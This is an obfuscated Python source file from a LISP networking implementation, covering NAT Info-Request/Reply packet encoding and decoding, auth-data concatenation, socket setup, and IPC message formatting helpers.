if 52 - 52: OoO0O00 + oO0o
if 84 - 84: O0 % I1ii11iIi11i % iIii1I11I1II1 - OoOoOO00 - Oo0Ooo
if 7 - 7: II111iiii % oO0o % i1IIi . iIii1I11I1II1
if 92 - 92: Ii1I / o0oOOo0O0Ooo % OOooOOo - OoOoOO00
if 44 - 44: I1IiiI + OoOoOO00 * Oo0Ooo
if 31 - 31: I11i - I1IiiI - OoO0O00 * OoOoOO00
if 50 - 50: I1ii11iIi11i + I11i * iII111i
if 27 - 27: OoOoOO00 * OOooOOo * iIii1I11I1II1 / i1IIi
if 60 - 60: OOooOOo * I1Ii111 . oO0o
if 47 - 47: oO0o % OOooOOo / OOooOOo % OoOoOO00 % I1Ii111 / OoOoOO00
if 51 - 51: I1IiiI . I11i - OoOoOO00
if 10 - 10: Oo0Ooo * OOooOOo / IiII . o0oOOo0O0Ooo
if 97 - 97: Ii1I . Ii1I % iII111i
LISP_DDT_ACTION_SITE_NOT_FOUND = - 2
LISP_DDT_ACTION_NULL = - 1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
if 49 - 49: Oo0Ooo % OOooOOo - OoooooooOO + IiII
lisp_map_referral_action_string = [
"node-referral" , "ms-referral" , "ms-ack" , "ms-not-registered" ,
"delegation-hole" , "not-authoritative" ]
if 54 - 54: iIii1I11I1II1 - OoooooooOO / I11i / oO0o % I1IiiI + OoOoOO00
if 26 - 26: OoO0O00 * II111iiii % OOooOOo * iII111i + iII111i
if 25 - 25: I11i - I1ii11iIi11i
if 100 - 100: I1Ii111 / Ii1I + OoOoOO00 . OoooooooOO
if 83 - 83: O0
if 35 - 35: i11iIiiIii - I11i . OoOoOO00 * II111iiii % i11iIiiIii
if 55 - 55: o0oOOo0O0Ooo / O0 / OoooooooOO * Oo0Ooo % iII111i
if 24 - 24: I1ii11iIi11i % OOooOOo + OoooooooOO + OoO0O00
if 100 - 100: Oo0Ooo % OoO0O00 - OoOoOO00
if 46 - 46: o0oOOo0O0Ooo
if 28 - 28: i1IIi
if 81 - 81: oO0o % OoooooooOO . I1Ii111 - OoOoOO00 / I1IiiI
if 62 - 62: I1Ii111 * I11i / I11i
if 42 - 42: ooOoO0o * ooOoO0o / Ii1I / OOooOOo * OOooOOo
if 92 - 92: Oo0Ooo / iII111i - OoooooooOO - o0oOOo0O0Ooo % ooOoO0o
if 35 - 35: i1IIi % iII111i % I11i * iIii1I11I1II1 % Ii1I - Oo0Ooo
if 94 - 94: iII111i
if 68 - 68: OoooooooOO % OOooOOo / OoooooooOO / I1Ii111 + Ii1I - o0oOOo0O0Ooo
if 81 - 81: I1IiiI
if 62 - 62: Ii1I * OoOoOO00
if 27 - 27: Oo0Ooo + Oo0Ooo / II111iiii % I1Ii111
if 11 - 11: Ii1I
if 54 - 54: I1IiiI * I1Ii111 / ooOoO0o / iIii1I11I1II1 % iII111i / oO0o
if 11 - 11: ooOoO0o + I1IiiI + Ii1I . II111iiii
if 50 - 50: Oo0Ooo
if 14 - 14: O0
if 67 - 67: II111iiii / O0
if 10 - 10: i1IIi / Oo0Ooo
if 20 - 20: Oo0Ooo * I1Ii111 / I1ii11iIi11i . ooOoO0o
if 67 - 67: o0oOOo0O0Ooo . Oo0Ooo % I11i
if 38 - 38: OOooOOo - OoO0O00 . ooOoO0o
if 50 - 50: o0oOOo0O0Ooo
if 85 - 85: II111iiii . iII111i - i1IIi
if 23 - 23: iII111i . Ii1I - OoO0O00 / I1ii11iIi11i / O0
if 4 - 4: i1IIi % Oo0Ooo % Ii1I * ooOoO0o - I11i
if 76 - 76: iIii1I11I1II1 / ooOoO0o % I1ii11iIi11i % OOooOOo
if 13 - 13: IiII
if 56 - 56: Oo0Ooo
if 55 - 55: i11iIiiIii + iIii1I11I1II1 / i1IIi / I1ii11iIi11i
if 64 - 64: IiII . OoO0O00 * i11iIiiIii
if 18 - 18: Ii1I % o0oOOo0O0Ooo - Oo0Ooo
if 28 - 28: IiII
if 93 - 93: Oo0Ooo % i1IIi
if 51 - 51: oO0o % O0
if 41 - 41: I1IiiI * I1IiiI . I1Ii111
if 38 - 38: I1IiiI % i11iIiiIii
if 17 - 17: i11iIiiIii
if 81 - 81: I1Ii111
if 25 - 25: I1IiiI
if 52 - 52: I1ii11iIi11i % i1IIi . IiII % OoOoOO00
if 50 - 50: OOooOOo * I1IiiI / o0oOOo0O0Ooo
if 91 - 91: iIii1I11I1II1 / OOooOOo * O0 . o0oOOo0O0Ooo + oO0o / I1ii11iIi11i
if 33 - 33: II111iiii + Ii1I
class lisp_info ( ) :
def __init__ ( self ) :
self . info_reply = False
self . nonce = 0
self . private_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . global_etr_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . global_ms_rloc = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . ms_port = 0
self . etr_port = 0
self . rtr_list = [ ]
self . hostname = lisp_hostname
if 46 - 46: IiII + O0 + i1IIi + ooOoO0o / iII111i
if 94 - 94: oO0o + iII111i * OoOoOO00 - i1IIi / OoooooooOO
def print_info ( self ) :
if ( self . info_reply ) :
o0o0O00O0oo = "Info-Reply"
oOo00O = ( ", ms-port: {}, etr-port: {}, global-rloc: {}, " + "ms-rloc: {}, private-rloc: {}, RTR-list: " ) . format ( self . ms_port , self . etr_port ,
# I1IiiI . OoO0O00 * iII111i % o0oOOo0O0Ooo
# IiII + OoooooooOO * I1ii11iIi11i . IiII * I1ii11iIi11i + IiII
red ( self . global_etr_rloc . print_address_no_iid ( ) , False ) ,
red ( self . global_ms_rloc . print_address_no_iid ( ) , False ) ,
red ( self . private_etr_rloc . print_address_no_iid ( ) , False ) )
if ( len ( self . rtr_list ) == 0 ) : oOo00O += "empty, "
for ooOoOo0O in self . rtr_list :
oOo00O += red ( ooOoOo0O . print_address_no_iid ( ) , False ) + ", "
if 47 - 47: OoooooooOO % I1ii11iIi11i + I1IiiI / I1Ii111
oOo00O = oOo00O [ 0 : - 2 ]
else :
o0o0O00O0oo = "Info-Request"
OOo0OOO0 = "<none>" if self . hostname == None else self . hostname
oOo00O = ", hostname: {}" . format ( blue ( OOo0OOO0 , False ) )
if 38 - 38: I1Ii111 - I11i * i1IIi + iIii1I11I1II1
lprint ( "{} -> nonce: 0x{}{}" . format ( bold ( o0o0O00O0oo , False ) ,
lisp_hex_string ( self . nonce ) , oOo00O ) )
if 41 - 41: Ii1I . OoO0O00 + I1ii11iIi11i + OoOoOO00
if 76 - 76: iII111i - iIii1I11I1II1
def encode ( self ) :
ooo0OOoo = ( LISP_NAT_INFO << 28 )
if ( self . info_reply ) : ooo0OOoo |= ( 1 << 27 )
if 23 - 23: I11i / OoO0O00 % OOooOOo
if 9 - 9: ooOoO0o % I1ii11iIi11i . OoooooooOO + OoO0O00 % OOooOOo * OoooooooOO
if 21 - 21: Ii1I % O0
if 15 - 15: II111iiii * Ii1I + IiII % iII111i
if 96 - 96: II111iiii * I1Ii111 / Oo0Ooo
IIii1i = struct . pack ( "I" , socket . htonl ( ooo0OOoo ) )
IIii1i += struct . pack ( "Q" , self . nonce )
IIii1i += struct . pack ( "III" , 0 , 0 , 0 )
if 35 - 35: I1IiiI
if 54 - 54: I1ii11iIi11i % o0oOOo0O0Ooo . i1IIi
if 72 - 72: Ii1I
if 87 - 87: iII111i - I1IiiI
if ( self . info_reply == False ) :
if ( self . hostname == None ) :
IIii1i += struct . pack ( "H" , 0 )
else :
IIii1i += struct . pack ( "H" , socket . htons ( LISP_AFI_NAME ) )
IIii1i += self . hostname + "\0"
if 54 - 54: iIii1I11I1II1 + oO0o * o0oOOo0O0Ooo % OoooooooOO . Oo0Ooo
return ( IIii1i )
if 32 - 32: iII111i
if 33 - 33: ooOoO0o + Oo0Ooo * OoOoOO00 % ooOoO0o * oO0o - OoO0O00
if 40 - 40: I11i . OoooooooOO * O0 / I1Ii111 + O0
if 97 - 97: ooOoO0o - ooOoO0o * OOooOOo % OoOoOO00 - OoOoOO00 - I1Ii111
if 52 - 52: O0 % iII111i
O000oOOoOOO = socket . htons ( LISP_AFI_LCAF )
O000oo0O0OO0 = LISP_LCAF_NAT_TYPE
iiii1 = socket . htons ( 16 )
Oo0OOOoOo0O = socket . htons ( self . ms_port )
ooI1ii1 = socket . htons ( self . etr_port )
IIii1i += struct . pack ( "HHBBHHHH" , O000oOOoOOO , 0 , O000oo0O0OO0 , 0 , iiii1 ,
Oo0OOOoOo0O , ooI1ii1 , socket . htons ( self . global_etr_rloc . afi ) )
IIii1i += self . global_etr_rloc . pack_address ( )
IIii1i += struct . pack ( "HH" , 0 , socket . htons ( self . private_etr_rloc . afi ) )
IIii1i += self . private_etr_rloc . pack_address ( )
if ( len ( self . rtr_list ) == 0 ) : IIii1i += struct . pack ( "H" , 0 )
if 74 - 74: I11i . II111iiii + O0 * II111iiii
if 50 - 50: IiII
if 7 - 7: OoO0O00 / I1IiiI * Ii1I % OoO0O00 + OoO0O00 % II111iiii
if 83 - 83: O0 % o0oOOo0O0Ooo
for ooOoOo0O in self . rtr_list :
IIii1i += struct . pack ( "H" , socket . htons ( ooOoOo0O . afi ) )
IIii1i += ooOoOo0O . pack_address ( )
if 77 - 77: I1Ii111 - OoooooooOO
return ( IIii1i )
if 2 - 2: OoOoOO00 - OOooOOo * o0oOOo0O0Ooo / OoO0O00 - IiII % I1IiiI
if 98 - 98: iIii1I11I1II1
def decode ( self , packet ) :
OO0o0 = packet
O00oO00oOO00O = "I"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 49 - 49: I1IiiI - I11i
ooo0OOoo = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
ooo0OOoo = ooo0OOoo [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
if 63 - 63: i11iIiiIii . OoO0O00 . oO0o
O00oO00oOO00O = "Q"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 85 - 85: oO0o . I1ii11iIi11i + i11iIiiIii
oOO000 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 85 - 85: I11i
ooo0OOoo = socket . ntohl ( ooo0OOoo )
self . nonce = oOO000 [ 0 ]
self . info_reply = ooo0OOoo & 0x08000000
self . hostname = None
packet = packet [ ooOoooOoo0oO : : ]
if 36 - 36: ooOoO0o % OoO0O00
if 1 - 1: OoooooooOO - OoOoOO00
if 35 - 35: I1Ii111
if 35 - 35: Oo0Ooo - iIii1I11I1II1 / i1IIi + OoO0O00 - OoooooooOO / i11iIiiIii
if 79 - 79: I1IiiI * ooOoO0o * ooOoO0o
O00oO00oOO00O = "HH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 92 - 92: iII111i % I1ii11iIi11i
if 16 - 16: oO0o
if 52 - 52: OoooooooOO % ooOoO0o - I1Ii111 * I11i
if 24 - 24: Ii1I + IiII + OoooooooOO / oO0o / I1IiiI + IiII
if 52 - 52: ooOoO0o
IIIiI1i , IIII1II11Iii = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if ( IIII1II11Iii != 0 ) : return ( None )
if 38 - 38: OoO0O00 + I1IiiI % IiII
packet = packet [ ooOoooOoo0oO : : ]
O00oO00oOO00O = "IBBH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 87 - 87: oO0o * Ii1I - I1Ii111 / oO0o
oo0o , O0Ooo000OO00 , o00O0Oo , IIi1I11 = struct . unpack ( O00oO00oOO00O ,
packet [ : ooOoooOoo0oO ] )
if 84 - 84: II111iiii
if ( IIi1I11 != 0 ) : return ( None )
packet = packet [ ooOoooOoo0oO : : ]
if 16 - 16: OoO0O00
if 60 - 60: Ii1I
if 72 - 72: ooOoO0o % I1Ii111
if 68 - 68: i1IIi
if ( self . info_reply == False ) :
O00oO00oOO00O = "H"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) >= ooOoooOoo0oO ) :
O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
if ( socket . ntohs ( O000oOOoOOO ) == LISP_AFI_NAME ) :
packet = packet [ ooOoooOoo0oO : : ]
packet , self . hostname = lisp_decode_dist_name ( packet )
if 95 - 95: OoOoOO00
if 82 - 82: II111iiii * I1IiiI * I1ii11iIi11i
return ( OO0o0 )
if 79 - 79: o0oOOo0O0Ooo - oO0o . ooOoO0o / ooOoO0o - iII111i / OoooooooOO
if 58 - 58: ooOoO0o * I1IiiI - OoO0O00 + OOooOOo
if 79 - 79: Oo0Ooo . i11iIiiIii * OoO0O00 / I11i * OoOoOO00
if 78 - 78: I11i . I1ii11iIi11i . I1ii11iIi11i
if 71 - 71: iII111i + IiII + I1IiiI - OoOoOO00
O00oO00oOO00O = "HHBBHHH"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 49 - 49: I1IiiI % O0 - OoooooooOO * OoO0O00 / iIii1I11I1II1 + I11i
O000oOOoOOO , O0o000 , O000oo0O0OO0 , O0Ooo000OO00 , iiii1 , Oo0OOOoOo0O , ooI1ii1 = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
if 7 - 7: iII111i * I1ii11iIi11i / oO0o
if 31 - 31: I1ii11iIi11i - II111iiii
if ( socket . ntohs ( O000oOOoOOO ) != LISP_AFI_LCAF ) : return ( None )
if 86 - 86: IiII % OOooOOo % OoOoOO00 / I1IiiI % OoooooooOO
self . ms_port = socket . ntohs ( Oo0OOOoOo0O )
self . etr_port = socket . ntohs ( ooI1ii1 )
packet = packet [ ooOoooOoo0oO : : ]
if 83 - 83: i1IIi . OoOoOO00 . i1IIi / OOooOOo * O0
if 99 - 99: OoooooooOO . OoOoOO00 / II111iiii
if 64 - 64: iII111i / i1IIi . I1IiiI + O0
if 5 - 5: O0 . i11iIiiIii
O00oO00oOO00O = "H"
ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
if 71 - 71: o0oOOo0O0Ooo + iII111i + ooOoO0o
if 27 - 27: OoooooooOO . iII111i * I1Ii111 % O0 + OoooooooOO - iII111i
if 86 - 86: i1IIi
if 81 - 81: OoOoOO00
O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
if ( O000oOOoOOO != 0 ) :
self . global_etr_rloc . afi = socket . ntohs ( O000oOOoOOO )
packet = self . global_etr_rloc . unpack_address ( packet )
if ( packet == None ) : return ( None )
self . global_etr_rloc . mask_len = self . global_etr_rloc . host_mask_len ( )
if 52 - 52: iII111i * IiII % I1IiiI * I11i
if 73 - 73: I1Ii111 * ooOoO0o
if 62 - 62: OOooOOo . I1IiiI * iIii1I11I1II1 + OoO0O00 * ooOoO0o / oO0o
if 14 - 14: iII111i / OoO0O00
if 75 - 75: IiII
if 68 - 68: IiII - i1IIi % IiII . OoO0O00 . i11iIiiIii . OoooooooOO
if ( len ( packet ) < ooOoooOoo0oO ) : return ( OO0o0 )
if 32 - 32: iII111i + OoO0O00 % IiII + I1IiiI
O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
if ( O000oOOoOOO != 0 ) :
self . global_ms_rloc . afi = socket . ntohs ( O000oOOoOOO )
packet = self . global_ms_rloc . unpack_address ( packet )
if ( packet == None ) : return ( OO0o0 )
self . global_ms_rloc . mask_len = self . global_ms_rloc . host_mask_len ( )
if 69 - 69: I1Ii111 + I11i - iIii1I11I1II1 - II111iiii . Ii1I
if 74 - 74: I1ii11iIi11i % o0oOOo0O0Ooo + O0 - i11iIiiIii - IiII % OOooOOo
if 39 - 39: OoO0O00 - o0oOOo0O0Ooo
if 71 - 71: iII111i . OoO0O00 + ooOoO0o - OOooOOo - Oo0Ooo
if 100 - 100: OoooooooOO - o0oOOo0O0Ooo + I1Ii111 . OoooooooOO % i11iIiiIii
if ( len ( packet ) < ooOoooOoo0oO ) : return ( OO0o0 )
if 64 - 64: I1Ii111 % OoooooooOO / i1IIi / OoO0O00
O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
if ( O000oOOoOOO != 0 ) :
self . private_etr_rloc . afi = socket . ntohs ( O000oOOoOOO )
packet = self . private_etr_rloc . unpack_address ( packet )
if ( packet == None ) : return ( OO0o0 )
self . private_etr_rloc . mask_len = self . private_etr_rloc . host_mask_len ( )
if 2 - 2: I11i % o0oOOo0O0Ooo . OoO0O00 . OoO0O00
if 89 - 89: ooOoO0o - oO0o + II111iiii + OoO0O00 - IiII
if 27 - 27: I1Ii111 - o0oOOo0O0Ooo + OoO0O00
if 38 - 38: OoOoOO00 + OoO0O00 . i11iIiiIii + Ii1I % i1IIi % I1IiiI
if 93 - 93: i11iIiiIii
if 63 - 63: iIii1I11I1II1 - iIii1I11I1II1 % o0oOOo0O0Ooo
while ( len ( packet ) >= ooOoooOoo0oO ) :
O000oOOoOOO = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] ) [ 0 ]
packet = packet [ ooOoooOoo0oO : : ]
if ( O000oOOoOOO == 0 ) : continue
ooOoOo0O = lisp_address ( socket . ntohs ( O000oOOoOOO ) , "" , 0 , 0 )
packet = ooOoOo0O . unpack_address ( packet )
if ( packet == None ) : return ( OO0o0 )
ooOoOo0O . mask_len = ooOoOo0O . host_mask_len ( )
self . rtr_list . append ( ooOoOo0O )
if 97 - 97: i1IIi % I11i % OoOoOO00
return ( OO0o0 )
if 25 - 25: OoOoOO00 . iIii1I11I1II1 - iII111i % II111iiii . OoOoOO00
if 16 - 16: OOooOOo . Oo0Ooo . I1IiiI % O0 . I1ii11iIi11i + i11iIiiIii
if 100 - 100: I1ii11iIi11i - i1IIi - OoO0O00 * o0oOOo0O0Ooo + OoOoOO00
class lisp_nat_info ( ) :
def __init__ ( self , addr_str , hostname , port ) :
self . address = addr_str
self . hostname = hostname
self . port = port
self . uptime = lisp_get_timestamp ( )
if 31 - 31: i1IIi
if 21 - 21: o0oOOo0O0Ooo / O0 % O0 . OoooooooOO / I1IiiI
def timed_out ( self ) :
oO000o0Oo00 = time . time ( ) - self . uptime
return ( oO000o0Oo00 >= ( LISP_INFO_INTERVAL * 2 ) )
if 94 - 94: ooOoO0o + OoO0O00 / ooOoO0o - ooOoO0o + Oo0Ooo + o0oOOo0O0Ooo
if 50 - 50: oO0o . Oo0Ooo
if 15 - 15: Ii1I
class lisp_info_source ( ) :
def __init__ ( self , hostname , addr_str , port ) :
self . address = lisp_address ( LISP_AFI_IPV4 , addr_str , 32 , 0 )
self . port = port
self . uptime = lisp_get_timestamp ( )
self . nonce = None
self . hostname = hostname
self . no_timeout = False
if 64 - 64: OoooooooOO
if 25 - 25: IiII
def cache_address_for_info_source ( self ) :
ii1i1I1111ii = self . address . print_address_no_iid ( ) + self . hostname
lisp_info_sources_by_address [ ii1i1I1111ii ] = self
if 29 - 29: OoOoOO00 % ooOoO0o * OoooooooOO
if 8 - 8: i11iIiiIii - I1Ii111 / IiII
def cache_nonce_for_info_source ( self , nonce ) :
self . nonce = nonce
lisp_info_sources_by_nonce [ nonce ] = self
if 17 - 17: i11iIiiIii * OoO0O00 . o0oOOo0O0Ooo . OoooooooOO . OoOoOO00 - I1ii11iIi11i
if 78 - 78: I1ii11iIi11i - OoooooooOO + O0
if 15 - 15: I1ii11iIi11i / IiII % I1IiiI
if 16 - 16: Ii1I
if 26 - 26: o0oOOo0O0Ooo / I11i + OoOoOO00 / OoOoOO00
if 31 - 31: I1Ii111
if 84 - 84: i11iIiiIii * OOooOOo . iII111i - Ii1I * i1IIi - I1ii11iIi11i
if 1 - 1: II111iiii
if 94 - 94: I1ii11iIi11i * iII111i % iII111i % I11i - iII111i
if 38 - 38: IiII - OoO0O00 % Ii1I - II111iiii
if 97 - 97: O0 . Ii1I
def lisp_concat_auth_data ( alg_id , auth1 , auth2 , auth3 , auth4 ) :
if 52 - 52: IiII
if ( lisp_is_x86 ( ) ) :
if ( auth1 != "" ) : auth1 = byte_swap_64 ( auth1 )
if ( auth2 != "" ) : auth2 = byte_swap_64 ( auth2 )
if ( auth3 != "" ) :
if ( alg_id == LISP_SHA_1_96_ALG_ID ) : auth3 = socket . ntohl ( auth3 )
else : auth3 = byte_swap_64 ( auth3 )
if 86 - 86: I1Ii111 / O0 + OoooooooOO % oO0o
if ( auth4 != "" ) : auth4 = byte_swap_64 ( auth4 )
if 45 - 45: I1IiiI . Oo0Ooo . I11i . Ii1I
if 81 - 81: II111iiii + OoOoOO00 % i11iIiiIii / iII111i . I1Ii111 + II111iiii
if ( alg_id == LISP_SHA_1_96_ALG_ID ) :
auth1 = lisp_hex_string ( auth1 )
auth1 = auth1 . zfill ( 16 )
auth2 = lisp_hex_string ( auth2 )
auth2 = auth2 . zfill ( 16 )
auth3 = lisp_hex_string ( auth3 )
auth3 = auth3 . zfill ( 8 )
iIi11i = auth1 + auth2 + auth3
if 48 - 48: I1IiiI . I1ii11iIi11i * OoOoOO00 % i1IIi / I1Ii111 * II111iiii
if ( alg_id == LISP_SHA_256_128_ALG_ID ) :
auth1 = lisp_hex_string ( auth1 )
auth1 = auth1 . zfill ( 16 )
auth2 = lisp_hex_string ( auth2 )
auth2 = auth2 . zfill ( 16 )
auth3 = lisp_hex_string ( auth3 )
auth3 = auth3 . zfill ( 16 )
auth4 = lisp_hex_string ( auth4 )
auth4 = auth4 . zfill ( 16 )
iIi11i = auth1 + auth2 + auth3 + auth4
if 62 - 62: o0oOOo0O0Ooo * I1Ii111 . iIii1I11I1II1 / i1IIi
return ( iIi11i )
if 75 - 75: OoooooooOO / ooOoO0o - iII111i . OoooooooOO . OoOoOO00 % i1IIi
if 7 - 7: OoOoOO00 . i1IIi * i11iIiiIii % i11iIiiIii
if 54 - 54: OoO0O00 / I1IiiI . Oo0Ooo
if 39 - 39: OoO0O00 . ooOoO0o
if 41 - 41: Oo0Ooo * I1ii11iIi11i - II111iiii - II111iiii
if 7 - 7: oO0o
if 41 - 41: ooOoO0o
if 93 - 93: Ii1I + I1Ii111 + Ii1I
if 23 - 23: I1IiiI - i1IIi / ooOoO0o
if 4 - 4: IiII . I1ii11iIi11i + iII111i % ooOoO0o
def lisp_open_listen_socket ( local_addr , port ) :
if ( port . isdigit ( ) ) :
if ( local_addr . find ( "." ) != - 1 ) :
iii11IIIiiIiI = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
if 41 - 41: I1Ii111 + ooOoO0o / OOooOOo + I11i % Oo0Ooo
if ( local_addr . find ( ":" ) != - 1 ) :
if ( lisp_is_raspbian ( ) ) : return ( None )
iii11IIIiiIiI = socket . socket ( socket . AF_INET6 , socket . SOCK_DGRAM )
if 91 - 91: I1IiiI % I1ii11iIi11i % oO0o / i1IIi * iIii1I11I1II1 + I11i
iii11IIIiiIiI . bind ( ( local_addr , int ( port ) ) )
else :
oO00 = port
if ( os . path . exists ( oO00 ) ) :
os . system ( "rm " + oO00 )
time . sleep ( 1 )
if 48 - 48: ooOoO0o / I1ii11iIi11i / OoO0O00 / II111iiii * OoOoOO00
iii11IIIiiIiI = socket . socket ( socket . AF_UNIX , socket . SOCK_DGRAM )
iii11IIIiiIiI . bind ( oO00 )
if 73 - 73: I11i / I1IiiI - IiII - i1IIi * IiII - OOooOOo
return ( iii11IIIiiIiI )
if 39 - 39: I11i . ooOoO0o * II111iiii
if 21 - 21: Ii1I
if 92 - 92: OoO0O00 * I1ii11iIi11i + iIii1I11I1II1
if 88 - 88: iIii1I11I1II1 + iIii1I11I1II1 * i11iIiiIii . I1ii11iIi11i % oO0o
if 94 - 94: I1IiiI / I1ii11iIi11i / OOooOOo
if 45 - 45: II111iiii
if 98 - 98: i11iIiiIii + I1ii11iIi11i * OOooOOo / OoOoOO00
def lisp_open_send_socket ( internal_name , afi ) :
if ( internal_name == "" ) :
if ( afi == LISP_AFI_IPV4 ) :
iii11IIIiiIiI = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
if 84 - 84: o0oOOo0O0Ooo
if ( afi == LISP_AFI_IPV6 ) :
if ( lisp_is_raspbian ( ) ) : return ( None )
iii11IIIiiIiI = socket . socket ( socket . AF_INET6 , socket . SOCK_DGRAM )
if 40 - 40: OoooooooOO - oO0o / O0 * I1Ii111 . O0 + i11iIiiIii
else :
if ( os . path . exists ( internal_name ) ) : os . system ( "rm " + internal_name )
iii11IIIiiIiI = socket . socket ( socket . AF_UNIX , socket . SOCK_DGRAM )
iii11IIIiiIiI . bind ( internal_name )
if 9 - 9: OOooOOo % O0 % O0 / I1ii11iIi11i . II111iiii / II111iiii
return ( iii11IIIiiIiI )
if 78 - 78: iIii1I11I1II1 - i1IIi . I11i . o0oOOo0O0Ooo
if 66 - 66: OOooOOo * Oo0Ooo
if 58 - 58: OOooOOo
if 96 - 96: IiII % OoooooooOO + O0 * II111iiii / OOooOOo . I1Ii111
if 47 - 47: OoO0O00 - Oo0Ooo * OoO0O00 / oO0o
if 13 - 13: ooOoO0o
if 55 - 55: i1IIi . I11i . II111iiii + O0 + ooOoO0o - i1IIi
def lisp_close_socket ( sock , internal_name ) :
sock . close ( )
if ( os . path . exists ( internal_name ) ) : os . system ( "rm " + internal_name )
return
if 3 - 3: iIii1I11I1II1 / oO0o
if 61 - 61: I1Ii111 / O0 - iII111i
if 44 - 44: i1IIi
if 23 - 23: I1ii11iIi11i . OoooooooOO / Ii1I + o0oOOo0O0Ooo
if 89 - 89: OoOoOO00 + Oo0Ooo . OoOoOO00 - II111iiii
if 85 - 85: OoooooooOO * OoooooooOO / Ii1I - II111iiii
if 69 - 69: iII111i * I11i
if 43 - 43: o0oOOo0O0Ooo - IiII * Ii1I . i11iIiiIii / II111iiii
def lisp_is_running ( node ) :
return ( True if ( os . path . exists ( node ) ) else False )
if 61 - 61: OoOoOO00 / I1IiiI . I1ii11iIi11i % OOooOOo
if 70 - 70: OOooOOo * OoOoOO00 / oO0o + Oo0Ooo / O0
if 16 - 16: Oo0Ooo / OoooooooOO / IiII + Oo0Ooo * i11iIiiIii
if 15 - 15: o0oOOo0O0Ooo / i11iIiiIii
if 63 - 63: I1ii11iIi11i - Ii1I + I11i
if 98 - 98: iII111i / IiII * I1IiiI / oO0o - iIii1I11I1II1
if 72 - 72: O0 . OOooOOo
if 99 - 99: i1IIi + iIii1I11I1II1 - ooOoO0o + OoO0O00 + Oo0Ooo . I1ii11iIi11i
if 74 - 74: i1IIi
def lisp_packet_ipc ( packet , source , sport ) :
return ( ( "packet@" + str ( len ( packet ) ) + "@" + source + "@" + str ( sport ) + "@" + packet ) )
if 80 - 80: ooOoO0o + I1Ii111 . I1ii11iIi11i % OoooooooOO
if 26 - 26: OoOoOO00 . iII111i * iIii1I11I1II1 / IiII
if 69 - 69: OoooooooOO / I11i + Ii1I * II111iiii
if 35 - 35: i11iIiiIii + oO0o
if 85 - 85: OoOoOO00 . O0 % OoooooooOO % oO0o
if 43 - 43: I1IiiI - I11i . I1IiiI / i11iIiiIii % IiII * i11iIiiIii
if 12 - 12: II111iiii - iIii1I11I1II1
if 43 - 43: i11iIiiIii % OoO0O00
if 100 - 100: i1IIi
def lisp_control_packet_ipc ( packet , source , dest , dport ) :
return ( "control-packet@" + dest + "@" + str ( dport ) + "@" + packet )
if 4 - 4: i11iIiiIii - OOooOOo * IiII % OoooooooOO - OoOoOO00
if 81 - 81: Ii1I * ooOoO0o . oO0o . IiII
if 71 - 71: IiII + OoO0O00
if 39 - 39: I1IiiI % IiII / II111iiii / II111iiii
if 95 - 95: II111iiii + i11iIiiIii + o0oOOo0O0Ooo
if 30 - 30: O0 - O0 % iIii1I11I1II1 + iII111i * OoooooooOO
if 1 - 1: O0
def lisp_data_packet_ipc ( packet , source ) :
return ( "data-packet@" + str ( len ( packet ) ) + "@" + source + "@@" + packet )
if 36 - 36: oO0o . iII111i
if 62 - 62: I11i + iIii1I11I1II1 % I11i * OOooOOo + iIii1I11I1II1 % Ii1I
if 56 - 56: o0oOOo0O0Ooo
if 55 - 55: oO0o - I1Ii111 / ooOoO0o % I1IiiI * OoooooooOO * I1IiiI
if 88 - 88: Ii1I + O0
if 92 - 92: I1IiiI % iII111i % I11i + OoooooooOO - i11iIiiIii
if 9 - 9: i11iIiiIii - II111iiii / ooOoO0o
if 81 - 81: i11iIiiIii % OoOoOO00 % OoO0O00 * Ii1I
if 85 - 85: OoooooooOO * ooOoO0o
def lisp_command_ipc ( packet , source ) :
return ( "command@" + str ( len ( packet ) ) + "@" + source + "@@" + packet )
if 23 - 23: OOooOOo / I11i / OoooooooOO - Ii1I / OoO0O00 - OoO0O00
if 60 - 60: OOooOOo . ooOoO0o % i1IIi % Ii1I % ooOoO0o + OoO0O00
if 26 - 26: O0 % o0oOOo0O0Ooo + iII111i * I1ii11iIi11i * I1Ii111
